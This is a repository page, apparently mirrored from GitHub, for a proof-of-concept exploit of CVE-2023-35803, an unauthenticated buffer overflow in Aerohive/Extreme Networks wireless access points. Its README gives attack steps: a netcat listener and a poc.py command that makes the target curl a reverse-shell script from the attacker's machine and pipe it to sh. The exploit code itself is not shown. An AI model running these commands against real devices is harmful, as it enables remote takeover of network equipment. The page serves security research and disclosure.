Giters

lachlan2k / CVE-2023-35803

PoC Exploit for CVE-2023-35803 Unauthenticated Buffer Overflow in Aerohive HiveOS/Extreme Networks IQ Engine

Home Page:https://research.aurainfosec.io/pentest/bee-yond-capacity/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-35803 - Unauthenticated RCE in Extreme Networks/Aerohive Wireless Access Points

PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.

  1. Edit revshell to point to your shell catcher IP/port
  2. Host the reverse shell: python3 -m http.server
  3. Open a shell catcher: nc -lvnp 1337
  4. Run the POC (may take a few minutes): python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"

Writeup here: https://research.aurainfosec.io/pentest/bee-yond-capacity/

About

PoC Exploit for CVE-2023-35803 Unauthenticated Buffer Overflow in Aerohive HiveOS/Extreme Networks IQ Engine

https://research.aurainfosec.io/pentest/bee-yond-capacity/

Languages

Language:Python 93.4%Language:Shell 6.6%